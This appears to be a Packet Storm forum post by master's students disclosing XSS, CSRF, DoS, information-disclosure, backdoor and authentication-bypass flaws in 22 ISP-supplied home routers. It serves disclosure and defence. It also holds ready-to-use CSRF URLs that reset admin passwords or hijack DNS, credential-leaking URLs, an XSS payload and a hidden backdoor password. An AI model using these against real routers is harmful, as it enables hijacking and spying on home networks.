Search the Community

Dear PacketStorm community, we are a group of security researchers doing our IT Security Master's Thesis at Universidad Europea de Madrid. As a part of the dissertation, we have discovered multiple vulnerability issues on the following SOHO routers: 1. Observa Telecom AW4062 2. Comtrend WAP-5813n 3. Comtrend CT-5365 4. D-Link DSL-2750B 5. Belkin F5D7632-4 6. Sagem LiveBox Pro 2 SP 7. Amper Xavi 7968 and 7968+ 8. Sagem Fast 1201 9. Linksys WRT54GL 10. Observa Telecom RTA01N 11. Observa Telecom Home Station BHS-RTA 12. Observa Telecom VH4032N 13. Huawei HG553 14. Huawei HG556a 15. Astoria ARV7510 16. Amper ASL-26555 17. Comtrend AR-5387un 18. Netgear CG3100D 19. Comtrend VG-8050 20. Zyxel P 660HW-B1A 21. Comtrend 536+ 22. D-Link DIR-600 The aforementioned vulnerabilities are: - Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20. - Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and #19. - Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20. - Denial of Service (DoS) on #1, #5 and #10. - Privilege Escalation on #1. - Information Disclosure on #4 and #11. - Backdoor on #10. - Bypass Authentication using SMB Symlinks on #12. - USB Device Bypass Authentication on #12, #13, #14 and #15. - Bypass Authentication on #13 and #14. - Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22. CVEs have already been requested to MITRE and other CNAs (since MITRE is taking forever to assign a CVE) and we are waiting for response. OSVDB IDs have been assigned. Vendors and manufacturers have already been reported. All routers have been physically tested. ============================================================================================ Manufacturer: Observa Telecom Model: AW4062 Tested firmwares: 1.3.5.18 and 1.4.2 (latest) Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL customers specially during 2012. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Multiple Cross-site Scriptings (XSS) found into the configuration menu within the router front-web. These XSS give an attacker the opportunity to execute malicious scripts. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121211 (http://osvdb.org/show/osvdb/121211) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e., there’s a vulnerable input field within the subdirectory Domain Blocking. When used legitimately, this input is used to block the traffic between the router and some particular domains. The script will remain stored (persistent XSS) into the field Domain from the Domain Block Table and it will be executed each time the victim access to the Domain Blocking subdirectory. This vulnerability can also be found within the input fields that belong to other subdirectories like Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic DNS and Advance/SNMP, between others. The most effective attack is found inside the Advance/SNMP subdirectory. By injecting the script into the System Name field, the malicious code will be executed each time someone connects to the router because the script is reflected into the home page. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121210 (http://osvdb.org/show/osvdb/121210), OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and OSVDB-121214 (http://osvdb.org/show/osvdb/121214) * PoC: I.e., if an attacker wants the victim to ping a certain IP address in order to check whether the victim is already logged into the router, he will send this URL to the victim: http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88 It is also possible for an attacker to change the default router password by sending the victim this URL: http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22 The URL above forces the user with index 0 (it is always going to be the user named 1234) to change his default password from 1234 to 12345. The following URL forces the victim to change his DNS servers to those the attacker wants to. http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3= Any action which is available within the website can be attacked through CSRF. This includes opening ports, changing the DHCP and NTP servers, modifying the Wireless Access point, enabling WPS, etc. -------------------------------------------------------------------------------------------- ---------------------------------- Privilege Escalation ---------------------------------- * Description: Any user without administrator rights is able to carry out a privilege escalation by reading the public router configuration file (config.xml). This file stores each of the router configuration parameters, including the credentials from all users in plain text. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and OSVDB-121285 (http://osvdb.org/show/osvdb/121285) * PoC: An user without administrator rights (i.e., user), connects to the router through FTP. This user is able to get both /etc/passwd and config.xml files. The file config.xml stores each of the router configuration parameters in plain text, including the credentials from all users. Doing so, any user is able to gain administrator privileges. This is critical because not too many people know there is another user apart from the administrator one. That means they only change the administrator password, leaving a default user with default credentials (user:user) being able to escalate privileges. -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.1.1/goform/admin/formReboot If a victim opens this URL, router commits all the information and reboots in a process that takes 60 seconds long. There are tons of ways for an attacker to do a Denial of Service attack by exploiting Cross Site Request Forgery vulnerabilities: a) Establish new firewall rules in order to block certain URLs, IPs or MACs. Even setting up a global Deny order is possible and only allowing traffic from/to certain IPs/MAcs. Delete the router configuration that allows itself to connect to the Internet Service Provider. c) Disable the Wireless Interface so no device can be connected through the 802.11 protocol. d) Etc. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033) Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one) Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers from 2011 to 2014 -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217) * PoC: Every input field is vulnerable to CSRF. Whenever the administrator user changes his password, he is actually opening the URL: /password.cgi?adminPassword=newpassword. An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890: http://192.168.1.1/password.cgi?adminPassword=1234567890 If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1 -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: CT-5365 Tested firmwares: A111-306TKF-C02_R16 Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers since 2012 -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-03-12. Waiting for assignation. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217) * PoC: Every input field is vulnerable to CSRF. Whenever the administrator user changes his password, he is actually opening the URL: /password.cgi?sysPassword=newpassword. An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890: http://192.168.1.1/password.cgi?sysPassword=1234567890 If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1 -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (Device Info -> DHCP). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DSL-2750B Tested firmwares: EU_1.01 Comments: -------------------------------------------------------------------------------------------- ------------------ Information Disclosure (Insecure Object References) ------------------- * Description: An attacker is able to obtain critical information without being logged in. * Report status: Reported to MITRE on 2015-03-25. Waiting for assignation. OSVDB-121219 (http://osvdb.org/show/osvdb/121219) * PoC: By accessing the URL http://192.168.1.1/hidden_info.html, browser shows huge amount of parameters such as SSID, Wi-Fi password, PIN code, etc. without requiring any login process. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Belkin Model: F5D7632-4 Tested firmwares: 6.01.04 Comments: -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out malicious actions. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121220 (http://osvdb.org/show/osvdb/121220) * PoC: Every input field is vulnerable to CSRF. I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so: http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252 &dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89 -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout="" This URL causes the router to reboot, interrupting any active connection and denying the service for about 20 seconds. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122389 (http://osvdb.org/show/osvdb/122389) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Sagem Model: LiveBox 2 Pro Tested firmwares: FAST3yyy_671288 Comments: Common router that ISP Orange used to give away to their ADSL customers. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code, even if the victim is not logged into the router web-config page. * Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121223 (http://osvdb.org/show/osvdb/121223) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. 1. The SSID field within the “Configuración-> Equipos -> Personalizar” (Configuration->Devices->Personalize) subdirectory allows script code injection. The script execution can be clearly seen within the “Configuración-> Equipos -> Mostrar” (Configuration->Devices->Show) subdirectory. 2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi -> SSID-name” (Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory allows script code injection. The script execution can be clearly seen within the main log-in webpage, even if the user is not logged in. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122387 (http://osvdb.org/show/osvdb/122387) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Amper Model: Xavi 7968 and Xavi 7968+ Tested firmwares: 3.01APT94 (latest one) Comments: Common router that ISP Telefónica used to give away to their ADSL customers from 2010 to 2013. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121224 (http://osvdb.org/show/osvdb/121224) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (/webconfig/status/dhcp_table.html). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122388 (http://osvdb.org/show/osvdb/122388) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings. ============================================================================================ ============================================================================================ Manufacturer: Sagem Model: Fast 1201 Tested firmwares: 3.01APT94 (latest one) Comments: - -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121222 (http://osvdb.org/show/osvdb/121222) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the DHCP Leases list (dhcpinfo.html). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Linksys Model: WRT54GL Tested firmwares: 4.30.16 build 6 Comments: - -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-04-15. Waiting for assignation. OSVDB-121221 (http://osvdb.org/show/osvdb/121221) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored into the hostname field within the Connected Clients list (DHCPTable.asp). It can be accessed either directly through the URL or through the Status-> Local Network -> DHCP Clients Table subdirectories. Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: RTA01N Tested firmwares: RTK_V2.2.13 Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Multiple Cross-site Scriptings (XSS) found into the configuration menu within the router front-web. These XSS give an attacker the opportunity to execute malicious scripts. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and OSVDB-121788 (http://osvdb.org/show/osvdb/121788) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e., Nombre del host (Hostname) input field within the subdirectory Servicio -> DDNS (Service -> DDNS or /ddns.htm) is vulnerable. There is another vulnerable input field within the Mantenimiento -> Contraseña (Maintenance -> Password or /userconfig.htm) subdirectory. After creating a user whose username contains the malicious script, it is stored into the User Accounts table and executes once the victim accesses this subdirectory. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121786 (http://osvdb.org/show/osvdb/121786) * PoC: I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios" It is also possible for an attacker to change the default router administrator password by sending the victim this URL: http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send" The URL above forces the administrator user (it is always going to be the user named 1234) to change his default password from 1234 to newpass. -------------------------------------------------------------------------------------------- ------------------------------------ Denial of Service ----------------------------------- * Description: An attacker is able to carry out an external Denial of Service attack * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. * PoC: It is possible for an attacker to carry out a Denial of Service attack through CSRF: http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send" If a victim opens this URL, router replies with HTTP 200 OK status code and reboots. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121789 (http://osvdb.org/show/osvdb/121789) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Active Clients table (/dhcptbl.html). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- ----------------------------------------- Backdoor --------------------------------------- * Description: There is a second default administrator user who is hidden to the legitimate router owner. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121785 (http://osvdb.org/show/osvdb/121785) * PoC: In addition to the well-known 1234 administrator user, there is another one named admin, whose password is 7449airocon. This superuser remains hidden (it does only appear into the backup configuration XML file) and is able to modify any configuration settings either through the web interface or through telnet. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules, carry out a persistent denial of service and obtain the WLAN passwords, between other things, by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. It is also possible for an attacker to change the WPS configuration settings, reset the AP to the default ones and obtain critical information, such as WLAN passwords. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: Home Station BHS-RTA Tested firmwares: v1.1.3 Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers -------------------------------------------------------------------------------------------- --------------------------------- Information Disclosure --------------------------------- * Description: Observa Telecom Home Station BHS-RTA web interface allows an external attacker to obtain critical information without login process. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121781 (http://osvdb.org/show/osvdb/121781), OSVDB-121782 (http://osvdb.org/show/osvdb/121782), OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and OSVDB-121784 (http://osvdb.org/show/osvdb/121784) * PoC: Without requiring any login process, an external attacker is able to obtain critical information such as the WLAN password and settings, the Internet configuration, a list of connected clients, etc. By accessing the following URL, browser shows WLAN configuration, including the passwords: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101 By accessing the following URL, browser shows a list of connected clients, including their IP and MAC addresses: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101 By accessing the following URL, browser shows the Internet configuration parameters: http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134 By accessing the following URL, browser shows whether the administrator password has been changed or is the default one. http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134 -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Observa Telecom Model: VH4032N Tested firmwares: VH4032N_V0.2.35 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121793 (http://osvdb.org/show/osvdb/121793) * PoC: The threat is found inside some entry inputs that let special characters to be written in and show the added information into the web itself. I.e, the SSID input field is vulnerable if the following code is written in: ‘; </script><script>alert(1)</script><script>// The malicious code will be executed throughout the whole web interface. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and OSVDB-121792 (http://osvdb.org/show/osvdb/121792) * PoC: Although the existence of a token related to session ID, configuration settings can be modified without the need of it. Thus, every input field is vulnerable to CSRF attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass If an attacker wants to change the FTP server configuration settings, such as the password and the allowance of remote FTP WAN connections, he may use the following link: http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2 -------------------------------------------------------------------------------------------- ------------------------ Bypass Authentication using SMB Symlinks ------------------------ * Description: An external attacker, without requiring any login process, is able to download the whole router kernel filesystem, including all the configuration information and the user account information files, by creating symbolic links through the router Samba server. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121790 (http://osvdb.org/show/osvdb/121790) * PoC: An unauthenticated attacker is able to download the whole router filesystem by connecting to the Samba server. There is a shared service (called storage) in which it is possible to create symbolic links to the router filesystem and download the content. I.e., a symlink to / is possible and allows the attacker to freely view and download the entire filesystem. -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121794 (http://osvdb.org/show/osvdb/121794) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122386 (http://osvdb.org/show/osvdb/122386) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings. ============================================================================================ ============================================================================================ Manufacturer: Huawei Model: HG553 Tested firmwares: V100R001C03B043SP01 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121778 (http://osvdb.org/show/osvdb/121778) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- --------------------------------- Bypass Authentication ---------------------------------- * Description: An external attacker, without requiring any login process, is able to reset the router settings to default ones besides bringing a permanent denial of service attack on. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121779 (http://osvdb.org/show/osvdb/121779) * PoC: Without requiring any login process, an attacker is able to bring on a permanent denial of service by constantly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router by using the default credentials. In both attacks, router replies with HTTP 400 status code, but either the reboot or the configuration reset is being correctly executed. -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121776 (http://osvdb.org/show/osvdb/121776) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code injection. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121775 (http://osvdb.org/show/osvdb/121775) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122385 (http://osvdb.org/show/osvdb/122385) * PoC: The Universal Plug and 